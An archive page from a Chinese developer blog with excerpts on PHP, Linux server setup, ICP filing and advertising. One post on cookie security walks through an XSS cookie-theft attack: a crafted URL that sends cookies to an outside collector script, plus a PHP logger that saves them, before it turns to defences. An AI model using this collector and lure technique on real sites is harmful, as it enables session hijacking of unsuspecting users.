作者归档:月小升

关于 月小升

正在创业

Centos下为lampp的piwik安装GeoIP地理库

Centos LAMPP 配置GEOIP yum install mod_geoip /usr/share/GeoIP/ // GeoIP 是国家数据,GeoLiteCity 是城市数据,GeoIPASNum 是组织数据 pwiki官方展示配置文件地址为 https://piwik.org/faq/how-to/#faq_163 /etc/apache2/mods-enabled/geoip.conf` 安装了lampp的服务器实际配置文件地址为 /etc/httpd/conf.d/geoip.conf cp /usr/share/GeoIP/GeoLiteCity.dat /www/stat/misc/ 这样就安装了GeoIP(php) 了。 不过系统提示我 本地理位置服务商最容易安装,不需要在服务器上设置 (适合虚拟主机!)。它使用 GeoIP 数据库和 MaxMind 的 PHP API 来准确定位访客的地理位置。 如果您的网站流量很大,这个服务速度会很慢。如果这样,您最好安装 PECL 扩展 或者 服务器模块。 接着鼓捣PECL安装方式 yum -y … 继续阅读

发表在 PHP | 标签为 , | 留下评论

简单5步 配置letsencrypt免费SSL

cd /root 1.下载letsencrypt配置文件和执行包 下载脚本文件 wget https://raw.githubusercontent.com/xdtianyu/scripts/master/lets-encrypt/letsencrypt.conf wget https://raw.githubusercontent.com/xdtianyu/scripts/master/lets-encrypt/letsencrypt.sh 给予脚本755权限 chmod +x letsencrypt.sh 2.配置letsencrypt.conf文件 vi letsencrypt.conf # only modify the values, key files will be generated automaticly. ACCOUNT_KEY="letsencrypt-account.key" DOMAIN_KEY="javaer.com.key" DOMAIN_DIR="/www/javaer" DOMAINS="DNS:java-er.com" #ECC=TRUE #LIGHTTPD=TRUE :wq! 保存 3.执行脚本生成需要的key文件 ./letsencrypt.sh letsencrypt.conf Generate account key… … 继续阅读

发表在 Linux | 标签为 , , | 留下评论

奥美创意总监眼里的socail

真正做social的人都知道social的范畴有多大,事情有多少,内容有多复杂。 对广告行业最大的冲击其实还不是懂不懂social,而是技术冲击,大部分广告人对广告载体的理解还停留在平面、tvc、网页这些最基础的端口,但整个广告载体日新月异,连朋友圈广告的标签怎么选,开屏广告位怎么投,光一个微博就有40多种广告产品,CPM怎么算,ROI怎么定,都是一头雾水。这种冲击让我经常后脊梁冒冷汗,每天不学点新东西就觉得自己要被踢出局了。 公司没有相关业务,并不代表你自己不能早做准备,每天多看案例,多接触新媒体,少打王者荣耀少追剧。 多看看BAT三家最近又做了什么案例,哪个创业项目又火了,微博微信的广告位有哪些变化,常用的二十个圈层里,有哪些新KOL冒出来。贴吧和B站,又有哪些新词汇,抖音下载了没,B612做过表情包吗,即刻开了几个通知。。。。 赵圆圆:以前一张静态的海报里,就能讲一个有时间地点人物,起因经过结果的小故事,而且还带剧情反转的梗。如果你现在每天看到的广告,就是明星举个手机,肯定觉得没内容。 内容是围绕产品产生的衍生物,也是把产品变成品牌的必经之路,从宣传物料到周边玩具,从虚拟表情包到影视剧,从VR眼镜到AI智能语音,这些都可以是内容的载体,然后就是因地制宜的讲故事,比如一支牙膏从洁牙工具,变成家庭关系、难忘回忆、情感维系、职场经历的一个触媒,这就是在做内容了。 希望他们多关注星座、锦鲤、海贼王、字幕组、明星八卦、网红产品等。 网红让我们这些朝九晚五上班的打工仔,知道了什么叫另一种人生。 赵圆圆:挺好的,公众号是检验自己到底有没有传播力的一块试金石,但仅此而已,它不是必需品,有兴趣就开着玩,没兴趣就不开。公众号写的好的人未必日常文案就写得好,同理美术做的好的人也许连个朋友圈都不发。 看到咪蒙的排版很好看,就去学,看到顾爷打广告的方式很有趣,就去试试,看到黎贝卡的异想世界转化效果好,就去研究。 不停的拆解那些头部自媒体的套路,亲自试验一番,然后就掌握了,掌握的越多,会的招式就越多,能够玩的组合就越多,而且都是大号们验证了成功的招式,这样博采众长,时间一长就能形成自己的武功了。 赵圆圆:微博在重新崛起分发小道消息,微信是长期稳定做普世内容,知乎是垂直专注深度答疑。我觉得区别很大,都找到了自己鲜明的定位,都会长久存在下去。 近两年这么多广告作品中,有哪个广告是您最喜欢的,又有哪个是您最不喜欢的? 赵圆圆:喜欢的数不过来,不喜欢的为什么要记得?要说最喜欢的,应该是谷歌每年的年度总结广告,看了就哭。 我的底线很低,只要让人留下印象的创意,都算好创意吧。 赵圆圆:分阶段吧,我现在又回去看咪蒙了,因为咪蒙的价值观是很多普通人认可的,我是做广告的,要把产品卖给更多的普通人,所以我一定要了解普通人的喜好,而不是把我自己的喜好加在广告里。 和菜头有些文章写得挺好的,毕竟年龄和阅历摆在那里,行文又很流畅。 罗辑思维总会创造认知焦虑,告诉你飞速发展的未来你都跟不上啦,所以你得买我的产品缓解一下焦虑。 不管是写段子也好、做广告也好,创意都很重要,那您在平时找灵感时都会上哪些网站? 赵圆圆:微博,微信,youtube,总之,人多的网站。 作为一名创意总监,什么样的人最吸引你? 赵圆圆:有特长的,哪怕特长是吹口琴,或者王者荣耀王者段位的。

发表在 互联网观察 | 标签为 , , , , | 留下评论

php时间国际化和本地转换

假如一个网站面临国际人群,那么可能分布在不同的时区,那么最好存入UTC时间在数据库,然后读出来以后,根据人群的位置,进行计算时间(月小升认为输出的还是UTC时间,但是要进行后处理,根据读者的时区用JS 来重新输出时间,就可以实现国际化了) <?php echo ‘<meta charset="UTF-8">’;   date_default_timezone_set("UTC"); $time1 = date("Y-m-d H:i:s"); $times1 = strtotime($time1);   echo time()."<br />";   echo "UTC时间:".$time1." – ".$times1."<br>";   date_default_timezone_set("PRC"); $time1 = date("Y-m-d H:i:s"); $times1 = strtotime($time1); echo "北京时间:".$time1." – ".$times1."<br>"; echo "当前时区:".date_default_timezone_get()."<br>";   … 继续阅读

发表在 PHP | 标签为 , , | 2 条评论

利用CURL直接调用Stripe接口

<?php   function test(){ var_dump($_POST);   $token = $_POST[’stripeToken’]; echo $token;   var_dump($_GET); $url = ‘https://api.stripe.com/v1/charges’; $data = array( "amount"=>’2000′, "currency"=>’usd’, "source"=>$token, "metadata[order_id]"=>’6735′, ); $i = 0; foreach ($data as $k=>$v){ $v = urlencode(stripslashes($v)); if($i==0){ $req .= "{$k}={$v}"; }else{ $req … 继续阅读

发表在 PHP | 标签为 , , | 一条评论

Cookie欺骗及反欺骗 论cookie安全

Cookie文件不能作为代码执行,也不会传送病毒,它为用户所专有并只能由创建它的服务器来读取。 浏览器一般只允许存放300个Cookie, 每个站点最多存放20个Cookie, 每个Cookie的大小限制为4KB, Cookie代表了你的身份,那么安全性就有得考虑了。 1.Cookie欺骗: Cookie记录了用户的帐户ID、密码之类的信息,通常使用MD5方法加密后在网上传递。经过加密处理后的信息即使被网络上一些别有用心的人截获也看不懂。然而,现在存在的问题是,截获Cookie的人不需要知道这些字符串的含义,只要把别人的Cookie向服务器提交,并且能够通过验证,就可以冒充受害人的身份登陆网站,这种行为叫做Cookie欺骗。 别人穿了你的衣服,冒充你去做了新郎 2.Cookie截获 Cookie以纯文本的形式在浏览器和服务器之间传送,很容易被他人非法截获和利用。任何可以截获Web通信的人都可以读取Cookie。  这个就是一些新手,还有一些网站,傻乎乎的把用户的账户和密码,明文在互联网上传送。核心信息都是加密传送的。记住一点,你发出的任何经过浏览器的信息,提交的表单,不仅仅服务器知道,还有网络传送过程的经历的那些路由器 Cookie截获 http://www.XXX.net/tXl/login/login.pl?username=&passwd=&ok.X=28&ok.y=6;
将其中”“更换为:
”“再试,如果执行成功,就开始构造URL:
http://www.XXX.net/tXl/login/login.pl?username=&passwd=&ok.X=28&ok.y=6.
其中http://www.cbifamily.org/cbi.php是用户能够控制的某台主机上的一个脚本。需要注意的是”%2b”为符号”+”的URL编码,因为”+”将被作为空格处理。该URL即可在论坛中发布,诱使别人点击。
 步骤二:编制收集Cookie的PHP脚本,并将其放到用户可以控制的网站上,当不知情者点击了构造的URL后可以执行该PHP代码。该脚本的具体内容如下: <?php  $info=getenv("OUERY_STRING");  if($info){   $fp=fopen("info.tXt","a");   fwrite($fp,!info."\n");  fclose($fp); }  header("Location:http://www.XXX.net"); ?> 将这段代码放到网络里,则能够收集所有人的Cookie。如果一个论坛允许HTML代码或者允许使用Flash标签,就可以利用这些技术收集Cookie的代码放到论坛里,然后给帖子取一个吸引人的主题,写上有趣的内容,很快就可收集到大量的Cookie。在论坛上,有许多人的密码就是被这种方法盗走的。  明白为啥那么多安全团队都会明确指出你的search.php的参数,可以注入javascript脚本是多么的危险啊 废话那么多。只是我好奇 如何防止cookie被伪装,盗取 答案1:不用cookie,用session (session的硬伤是无法做到保持用户一年免输入密码登录) 答案2:用cookie,但是我加密 比如常规情况下我保存一个cookie username setcookie("username",$username); 现在我保存2个 username, token setcookie("username",$username); setcookie("token",$token); $token 是怎么来的 … 继续阅读

发表在 JAVA, PHP, WEB前端 | 标签为 , , | 留下评论

linux服务器FTP 用户无法修改文件权限

默认是不让你修改的 修改ftp.conf <Limit SITE_CHMOD> AllowAll # DenyAll </Limit> 默认DenyAll 改成AllowAll 就好了。 重启ftp服务器 vsftp和lampp的ftp 理论上一样吧 以上配置为lampp自带的 就这么简单linux服务器FTP 用户登陆后 (无论是windows客户端,还是苹果mac的客户端都可以) 修改文件权限为777了。

发表在 Linux | 标签为 , | 留下评论

跨境电商网站ICP备案

跨境电商网站ICP备案确实让从事跨境电商的朋友烦恼不已,尤其是对我们国家互联网信息服务管理办法知之甚少的境外企业,当真头疼不已。跨境电商网站到底要不要进行ICP备案呢?TMO具体问题具体分析,下面就境外网站ICP备案的认知,分别从进口跨境电商和出口跨境电商两个方面来说明跨境电商网站的ICP备案事宜。 一、境外网站ICP备案认知 我们公司的主营业务是为跨境电商企业提供相应的解决方案,所以我们的客户大部分是境外企业,这些跨国公司在中国从事跨境电商业务,做电商就必须要网站,很多客户以前做过电子商务,并不想来中国之后重新租用空间域名做新站,因此还是用的国外的空间做跨境电商,这样就会出现一个问题,那就是备案的问题,大家都知道,在中国做网站上线都是需要备案的,没备案网站是不能上线的,但是用国外的服务器是不是就不要备案呢?或者说境外电子商务网站在中国需要icp备案吗? 这个问题我们需要分几点来回答,境外普通网站备案问题和境外电子商务网站备案问题,如果你的网站只是普通的网站(即非经营性的),就不需要备案,但是也必须保证不违反中国法律,如果你的是境外电子商务网站,那么就必须要备案。 《互联网信息服务管理办法》第四条规定国家对经营性互联网信息服务实行许可制度;对非经营性互联网信息服务实行备案制度。未取得许可或者未履行备案手续的,不得从事互联网信息服务。国外服务器虽然不备案依然可以上线,但是属于非法,中国政府可以随时屏蔽你的空间,如果涉嫌经营性服务,那么一定要有这个icp证,否则,不查则已一查必罚。 注:通过上面的介绍我们也知道,跨境电商网站想要在中国大陆生存和发展就必须进行ICP备案,经过工信部的审核授权,否则基本不可能在中国大陆合法存在,也就更谈不上进驻中国市场,抢占中国电商市场了。跨境电商分为两种情况,我们具体来说说相应的ICP备案。 二、出口跨境电商网站ICP备案 什么是出口跨境电商?站在我们的角度,那就是将我们国家的商品以电子商务的形式销售至境外的国家和地区,出口跨境电商的对象是非中国大陆消费者,所以,只要我们的电商网站能在目标消费者所在国家被正常访问和浏览,那么网站的ICP备案问题就不存在了。 目前国外以及香港、澳门、台湾地区的网站都是不需要进行备案的,所以说,如果我们的跨境电商业务目标消费人群集中在境外,那么我们可以不用进行备案,租用非大陆的空间服务器,将网站托管在境外,至于境内的办事机构只需通过一些措施接入到境外网络,实现对网站的管理即可。所以说,出口跨境电商是不需要纠结于ICP备案的。 三、进口跨境电商网站ICP备案 进口跨境电商网站可以分为两种,一是原本就在境内的电商网站,一是国外的跨境电商网站。境内的跨境电商网站按照一般的经营性网站申请ICP备案即可,境外的网站该如何进行ICP备案呢?根据工信部的说明,国外空间是不可以在中国进行备案的,所以,对于这些境外网站而言,除了改用中国大陆的空间服务器别无他选。也就是说,无论是境内还是境外的网站,只要你想在中国大陆进行电子商务活动就必须将网站托管在中国大陆的服务器上,接受中国政府的监管。 综上所述,做出口跨境电商无需纠结于ICP备案,可以选择境外的空间来运营电商网站。但是从事进口跨境电商,ICP备案是必须要的,无论是境内企业还是境外企业,只要是进入中国大陆从事电商业务,就必须搭建依托大陆空间服务器的网站并进行ICP备案,ICP备案可以在空间服务商处申请,空间服务商会进行相应的协助和代办。

发表在 阅读笔记 | 标签为 , , , | 2 条评论

每日自动读取一次网页脚本Linux

定时执行个小文件,这样就能做很多事儿 vi autocloseorder.sh chmod 755 autocloseorder.sh DATE=`date "+%Y-%m-%d %H:%M:%S"` echo $DATE >> /backup/server/log/auto.log wget -O test.html -q http://xtc.k1d.com.cn/Reflash/index/ 每天夜里3点32 执行一次 32 03 * * * root /backup/backupwebsite/site.sh 两分钟一次 */2 * * * * root /backup/server/autocloseorder.sh

发表在 Linux | 标签为 , , | 3 条评论

php 过滤非中文,数字,字母的特殊字符

搜索引擎吃进数据的时候,是不需要那些奇怪的字符的 $str = "?><?》”\"《喂喂喂,555?,12312。 3》《|“:L}{P+_)In thsdff0?><M<>\"s~!@#$%^&*()+_)(*&dsdffsde~!@#¥%……&*5545445()+——)(*&……%¥#@!~ 电影_后天 230809-peopl.e die我d.(*&^%$#@!!~"; echo match_chinese($str);   function match_chinese($chars,$encoding=’utf8′) { $pattern =($encoding==’utf8′)?’/[\x{4e00}-\x{9fa5}a-zA-Z0-9,,。 ]/u’:'/[\x80-\xFF]/’; preg_match_all($pattern,$chars,$result); $temp =join(”,$result[0]); return $temp; }

发表在 PHP | 标签为 , , | 留下评论